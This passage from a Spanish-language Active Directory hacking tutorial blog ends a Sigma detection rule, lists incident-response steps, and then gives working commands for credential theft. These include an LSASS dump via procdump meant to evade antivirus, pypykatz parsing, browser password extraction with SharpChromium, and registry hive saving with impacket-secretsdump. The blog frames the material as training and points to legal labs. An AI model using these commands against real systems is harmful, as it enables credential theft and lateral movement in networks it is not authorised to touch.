        AttributeLDAPDisplayName: 'msDS-AllowedToDelegateTo'
    condition: selection
level: high

🚨 Qué hacer cuando salta la alerta (Protocolo de Respuesta)

Si ves estas reglas disparándose en tu SIEM, el tiempo es vital. Este es el protocolo de respuesta a incidentes (IR):

  1. Aislamiento: Identifica la IP de origen (la máquina del atacante) y desconéctala del switch o bloquéala en el firewall interno.

  2. Reset de Contraseñas: Si el evento 4624 muestra que una cuenta de Administrador fue comprometida, cambia su contraseña inmediatamente.

  3. Limpieza de Tickets: Ejecuta klist purge en las máquinas afectadas para eliminar cualquier ticket Kerberos malicioso que el atacante haya inyectado.

  4. Revisión de persistencia: Busca nuevas cuentas de computadora creadas en los últimos 30 minutos (EventID 4741).

Conclusión de tu Proceso de Aprendizaje

Has recorrido todo el camino:

  • Ataque: Desde mitm6 hasta Pass-the-Ticket.

  • Análisis: Identificación de hashes y tickets.

  • Defensa: Mitigación mediante GPO y endurecimiento de protocolos.

  • Monitoreo: Creación de reglas de detección para un SIEM.

Con este conocimiento, estás listo para enfrentar auditorías de Active Directory con una base muy sólida.

 

Para cerrar con "broche de oro", vamos a ver las técnicas de Post-Explotación de Credenciales. Una vez que tienes una shell en una máquina (vía Evil-WinRM o Psexec), el objetivo es extraer contraseñas guardadas para saltar a otros servidores o persistir en la red.

Las dos fuentes de oro son el proceso LSASS y los Navegadores Web.

1. Volcado de Memoria de LSASS (Local Security Authority Subsystem Service)

LSASS es el proceso de Windows que gestiona las credenciales de los usuarios que han iniciado sesión. Si eres Administrador, puedes "volcar" su memoria y extraer hashes o incluso contraseñas en texto plano (en sistemas antiguos o mal configurados).

El método "sigiloso" (sin Mimikatz directo)

Para evitar que el antivirus salte, no usamos Mimikatz de inmediato. Usamos una herramienta legítima de Microsoft: Procdump.

  1. Subir Procdump a la víctima.

  2. Ejecutar el volcado:

    PowerShell
    .\procdump.exe -ma lsass.exe lsass.dmp

  3. Descargar el archivo .dmp a tu Kali Linux.

  4. Extraer secretos con Pypykatz (en Kali):

    Bash
    pypykatz lsa minidump lsass.dmp

2. Robo de Credenciales de Navegadores (Chrome, Edge, Brave)

Los usuarios suelen guardar sus contraseñas de portales corporativos, correos y nubes en el navegador. Estas se guardan en una base de datos SQLite cifrada con una Master Key del usuario.

Cómo extraerlas con SharpChromium

Si tienes una shell, puedes usar este binario (o scripts de PowerShell similares):

PowerShell
.\SharpChromium.exe logins

¿Qué obtiene el atacante?

  • URL del sitio (ej. https://outlook.office365.com).

  • Nombre de usuario.

  • Contraseña (descifrada en tiempo real usando la API de Windows del usuario actual).

3. Extracción de Secretos de LSA y SAM (Modo Offline)

Si quieres ser rápido, puedes extraer las colmenas (hives) del registro de Windows y procesarlas en tu Kali.

  1. En la víctima (PowerShell):

    PowerShell
    reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save

  2. En Kali Linux (impacket-secretsdump):

    Bash
    impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

    Esto te dará los hashes NTLM de todos los usuarios locales y, a veces, contraseñas de cuentas de servicio.

🚀 Conclusión del Entrenamiento "Full Stack Hacker"

Has pasado de ser un observador en la red a:

  1. Mitm6: Controlar el tráfico IPv6.

  2. NTLM Relay: Suplantar identidades.

  3. RBCD: Escalar a Administrador de Dominio.

  4. Post-Explotación: Vaciar la memoria de LSASS y los navegadores.

  5. Blue Team: Crear reglas Sigma para detectar todo lo anterior.

Tu siguiente paso real

Si quieres practicar esto en un entorno legal y seguro, te recomiendo encarecidamente los laboratorios de HackTheBox (Dante o Pro Labs) o TryHackMe (Holo o Wreath). Ahí podrás ejecutar toda esta cadena de ataques contra máquinas reales de Active Directory.

Location: España

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Imagen
  www.onlinetis.com   Hacking y ciberseguridad en kali linux con Fping Fping es un programa similar a ping que utiliza la solicitud de eco del Protocolo de Mensajes de Control de Internet (ICMP) para determinar si un host objetivo responde. fping se diferencia de ping en que permite especificar cualquier número de objetivos en la línea de comandos o un archivo con las listas de objetivos a los que se hará ping. En lugar de enviar a un objetivo hasta que se agote el tiempo de espera o responda, fping envía un paquete de ping y pasa al siguiente objetivo mediante un sistema de turnos rotatorios. Como instalar:  sudo apt install fping fping Enviar paquetes ICMP ECHO_REQUEST a los hosts de la red   fping6 Compatibilidad con versiones anteriores de fping anteriores a la versión 4.0 El comando fping en Kali Linux es una utilidad de red que se utiliza para enviar paquetes de ICMP (Protocolo de mensajes de control de Internet) a varios hosts de forma simultánea. A diferen...
LEER MAS »

Hacking y ciberseguridad en kali linux con atk6-thcping6

Imagen
www.onlinetis.com Hacking y ciberseguridad en kali linux con atk6-thcping6 Parece que estás interesado en usar atk6-thcping6 en Kali Linux. Esta herramienta es parte del conjunto de utilidades thc-ipv6 , diseñado para probar las debilidades del protocolo IPv6. Para usar atk6-thcping6 , primero necesitas tener instalado el paquete thc-ipv6 . En la mayoría de las distribuciones de Kali, ya viene preinstalado, pero si no, puedes instalarlo con el siguiente comando: Bash sudo apt install thc-ipv6 Una vez que lo tienes instalado, la sintaxis básica para atk6-thcping6 es: Bash atk6-thcping6 <interface> <target> [opciones] Aquí está el desglose de los argumentos y opciones más comunes: <interface> : La interfaz de red que usarás para enviar el paquete. Por ejemplo, eth0 , wlan0 , etc. <target> : La dirección IPv6 del objetivo al que quieres hacer ping. [opciones] : Puedes usar varias opciones para modificar el comportamiento del ping. La mejor manera de ver todas la...
LEER MAS »

Como utilizar Fierce en kali linux

Imagen
  www.onlinetis.com   Como utilizar Fierce en kali linux Fierce es un escáner semiligero que ayuda a localizar direcciones IP no contiguas y nombres de host en dominios específicos. Está pensado como precursor de nmap, unicornscan, nessus, nikto, etc., ya que todos ellos requieren que se conozca previamente el espacio IP buscado. No realiza exploits ni escanea internet indiscriminadamente. Está diseñado específicamente para localizar objetivos probables tanto dentro como fuera de una red corporativa. Dado que utiliza principalmente DNS, es frecuente encontrar redes mal configuradas que filtran el espacio de direcciones interno. Esto es especialmente útil en malware dirigido. Originalmente escrito por RSnake y otros en http://ha.ckers.org/. Se trata simplemente de una conversión a Python 3 para simplificar y modernizar el código base. Como instalar: sudo apt install fierce Escáner DNS que ayuda a localizar espacios de IP no contiguos y nombres de host contra dominios específico...
LEER MAS »